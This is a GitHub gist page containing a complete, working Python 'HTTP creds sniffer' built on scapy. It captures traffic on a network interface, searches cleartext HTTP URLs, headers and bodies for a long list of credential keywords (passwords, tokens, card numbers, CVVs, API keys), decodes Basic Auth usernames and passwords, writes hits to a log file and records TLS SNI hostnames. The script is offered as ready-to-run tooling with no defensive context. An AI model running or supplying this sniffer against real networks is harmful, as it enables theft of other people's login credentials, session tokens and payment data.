Skip to content

Instantly share code, notes, and snippets.

@caueb
Last active June 11, 2025 23:27
Show Gist options
  • Select an option

  • Save caueb/8794c0c7ccac51286527617cd0dd4bf1 to your computer and use it in GitHub Desktop.

Select an option

Save caueb/8794c0c7ccac51286527617cd0dd4bf1 to your computer and use it in GitHub Desktop.
Simple HTTP creds sniffer
#!/usr/bin/env python3
import sys
import datetime
import base64
import re
from urllib.parse import unquote
from scapy.all import sniff, Raw, IP, TCP
from scapy.layers.http import HTTPRequest
from scapy.layers.tls.handshake import TLSClientHello
from scapy.layers.tls.record import TLS
import warnings
# === ANSI Colors ===
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
CYAN = "\033[96m"
RESET = "\033[0m"
# === Credential Keywords ===
keywords = [
"username", "userid", "user_id", "login", "logon", "uname", "account", "userName", "UserID",
"password", "pass", "passwd", "pwd", "secret", "pin", "passcode", "userpass", "user_pass",
"email", "e-mail", "useremail", "emailaddress", "email_address",
"token", "auth", "access_token", "id_token", "session", "jwt", "sso", "oauth", "csrf", "csrf_token",
"creditcard", "card_number", "cardnum", "cvv", "cvc", "expdate", "expiry",
"mobile", "mfa", "otp", "2fa", "twofa", "verification", "verify", "idnumber", "id_num", "nin",
"credentials", "authdata", "logininfo", "signin", "signup", "register",
"authorization", "bearer", "api_key", "apikey", "api-key"
]
log_file = None
processed_requests = {} # Simple deduplication cache
import time
def log(message):
timestamp = datetime.datetime.now().strftime("[%d-%m-%Y %H:%M:%S]")
full_message = f"{timestamp} {message}"
print(full_message)
if log_file:
try:
with open(log_file, "a") as f:
f.write(strip_ansi(full_message) + "\n")
except:
pass
def strip_ansi(text):
import re
return re.sub(r'\x1b\[[0-9;]*m', '', text)
def keyword_match(data):
data = data.lower()
for keyword in keywords:
if keyword in data:
return keyword
return None
def extract_headers_and_body(raw_data):
parts = raw_data.split("\r\n\r\n", 1)
headers = parts[0] if len(parts) > 0 else ""
body = parts[1] if len(parts) > 1 else ""
return headers, body
def is_http_packet(packet):
if packet.haslayer(Raw):
try:
data = packet[Raw].load
return b"HTTP" in data or data.startswith((b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS"))
except:
return False
return False
def sniff_packets(interface):
web_ports = [
80, 443, 8000, 8080, 8081, 8443, 9443, 8888,
3128, 3000, 5000
]
port_filter = " or ".join([f"tcp port {p}" for p in web_ports])
log(f"{CYAN}[*] Sniffing on interface: {interface}{RESET}")
log(f"{CYAN}[*] Monitoring ports: {', '.join(map(str, web_ports))}{RESET}")
sniff(iface=interface, store=False, prn=process_packet, filter=port_filter)
def get_url(packet):
try:
host = packet[HTTPRequest].Host.decode()
path = packet[HTTPRequest].Path.decode()
dst_port = packet[TCP].dport
# Include port if it's not default port 80
if dst_port != 80:
return f"http://{host}:{dst_port}{path}"
else:
return f"http://{host}{path}"
except:
return None
def process_packet(packet):
if not packet.haslayer(IP) or not packet.haslayer(TCP):
return
src_ip = packet[IP].src
dst_ip = packet[IP].dst
dst_port = packet[TCP].dport
# Skip duplicates and retransmissions - only process packets with data
if not packet.haslayer(Raw) or len(packet[Raw].load) == 0:
return
# === Check Scapy's HTTP layer ===
if packet.haslayer(HTTPRequest):
url = get_url(packet)
if not url:
url = f"http://{dst_ip}:{dst_port}"
# Simple deduplication: check if we've seen this request recently
current_time = time.time()
request_key = f"{src_ip}->{url}"
if request_key in processed_requests:
if current_time - processed_requests[request_key] < 2: # 2 second window
return # Skip duplicate request silently
processed_requests[request_key] = current_time
# Cleanup old entries (keep only last 100 requests)
if len(processed_requests) > 100:
oldest_entries = sorted(processed_requests.items(), key=lambda x: x[1])[:50]
for key, _ in oldest_entries:
del processed_requests[key]
log(f"{GREEN}[HTTP] {src_ip} -> {url}{RESET}")
match_url = keyword_match(url)
if match_url:
log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}")
log(f"{YELLOW}Source IP : {src_ip}{RESET}")
log(f"{YELLOW}Keyword : {match_url}{RESET}")
log(f"{YELLOW}Found In : URL{RESET}")
log(f"{YELLOW}URL : {url}{RESET}")
# Check HTTPRequest fields directly for known headers
http_req = packet[HTTPRequest]
# Check specific header fields that HTTPRequest parses - focus on auth-related ones
header_fields = ['Authorization', 'Cookie', 'Proxy_Authorization', 'X_Csrf_Token']
for field_name in header_fields:
if hasattr(http_req, field_name):
field_value = getattr(http_req, field_name, None)
if field_value:
# Convert bytes to string if needed
field_value_str = field_value.decode() if isinstance(field_value, bytes) else str(field_value)
field_str = f"{field_name}: {field_value_str}"
match_header = keyword_match(field_str)
if match_header:
# URL decode the header for better readability
try:
decoded_header = unquote(field_str)
except:
decoded_header = field_str
log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}")
log(f"{YELLOW}Source IP : {src_ip}{RESET}")
log(f"{YELLOW}Keyword : {match_header}{RESET}")
log(f"{YELLOW}Found In : Header{RESET}")
log(f"{YELLOW}Header : {decoded_header}{RESET}")
# Decode Authorization: Basic base64(user:pass)
if field_name.lower() == "authorization" and field_value_str.startswith("Basic "):
encoded = field_value_str[6:].strip()
try:
decoded = base64.b64decode(encoded).decode()
log(f"{YELLOW}Decoded Basic Auth : {decoded}{RESET}")
except Exception as e:
log(f"{YELLOW}Failed to decode Basic Auth: {e}{RESET}")
# Check body for keywords if Raw layer exists
if packet.haslayer(Raw):
try:
data = packet[Raw].load.decode(errors='ignore')
# For HTTPRequest packets, Raw usually contains just the body
match_body = keyword_match(data)
if match_body:
# URL decode the body data for better readability
try:
decoded_data = unquote(data)
except:
decoded_data = data
log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}")
log(f"{YELLOW}Source IP : {src_ip}{RESET}")
log(f"{YELLOW}Keyword : {match_body}{RESET}")
log(f"{YELLOW}Found In : Body{RESET}")
log(f"{YELLOW}Raw : \n{decoded_data}{RESET}")
except:
pass
# Return early to avoid duplicate processing in manual fallback
return
# === Manual fallback parsing ===
elif packet.haslayer(Raw):
try:
data = packet[Raw].load.decode(errors='ignore')
if data.startswith(("GET", "POST", "PUT", "HEAD", "OPTIONS", "DELETE")):
headers, body = extract_headers_and_body(data)
request_line = headers.split("\r\n")[0] if headers else ""
if len(request_line.split()) > 1:
path = request_line.split()[1]
url = f"http://{dst_ip}:{dst_port}{path}"
else:
url = f"http://{dst_ip}:{dst_port}"
# Simple deduplication for manual parsing too
current_time = time.time()
request_key = f"{src_ip}->{url}"
if request_key in processed_requests:
if current_time - processed_requests[request_key] < 2: # 2 second window
return
processed_requests[request_key] = current_time
log(f"{GREEN}[HTTP] {src_ip} -> {url}{RESET}")
# Check URL for keywords in manual parsing
match_url = keyword_match(url)
if match_url:
log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}")
log(f"{YELLOW}Source IP : {src_ip}{RESET}")
log(f"{YELLOW}Keyword : {match_url}{RESET}")
log(f"{YELLOW}Found In : URL{RESET}")
log(f"{YELLOW}URL : {url}{RESET}")
for line in headers.split("\r\n")[1:]:
match_header = keyword_match(line)
if match_header:
# URL decode the header for better readability
try:
decoded_line = unquote(line.strip())
except:
decoded_line = line.strip()
log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}")
log(f"{YELLOW}Source IP : {src_ip}{RESET}")
log(f"{YELLOW}Keyword : {match_header}{RESET}")
log(f"{YELLOW}Found In : Header{RESET}")
log(f"{YELLOW}Header : {decoded_line}{RESET}")
# Decode Authorization: Basic base64(user:pass)
if line.lower().startswith("authorization: basic"):
encoded = line.split(" ", 2)[-1].strip()
try:
decoded = base64.b64decode(encoded).decode()
log(f"{YELLOW}Decoded Basic Auth : {decoded}{RESET}")
except Exception as e:
log(f"{YELLOW}Failed to decode Basic Auth: {e}{RESET}")
match_body = keyword_match(body)
if match_body:
# URL decode the body data for better readability
try:
decoded_body = unquote(body)
except:
decoded_body = body
log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}")
log(f"{YELLOW}Source IP : {src_ip}{RESET}")
log(f"{YELLOW}Keyword : {match_body}{RESET}")
log(f"{YELLOW}Found In : Body{RESET}")
log(f"{YELLOW}Raw : \n{decoded_body}{RESET}")
except Exception as e:
log(f"{YELLOW}[DEBUG] Fallback decode error: {e}{RESET}")
# === TLS SNI parsing ===
elif packet.haslayer(TLS) and packet.haslayer(TLSClientHello):
try:
sni = packet[TLSClientHello].ext_servername.decode()
log(f"{CYAN}[TLS] {src_ip} -> https://{sni} (Client Hello SNI){RESET}")
except:
pass
# === Entry Point ===
if __name__ == "__main__":
interface = None
log_file = None
if "-i" in sys.argv:
try:
interface = sys.argv[sys.argv.index("-i") + 1]
except IndexError:
print("[-] Missing interface after -i")
sys.exit(1)
else:
print("Usage: sudo python3 sniffer.py -i <interface> [-o <output_file>]")
sys.exit(1)
if "-o" in sys.argv:
try:
log_file = sys.argv[sys.argv.index("-o") + 1]
print(f"[*] Output will be logged to: {log_file}")
except IndexError:
print("[-] Missing filename after -o")
sys.exit(1)
try:
warnings.filterwarnings("ignore", message="Unknown cipher suite.*")
sniff_packets(interface)
except KeyboardInterrupt:
print(f"\n{CYAN}[!] Exiting...{RESET}")
sys.exit(0)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment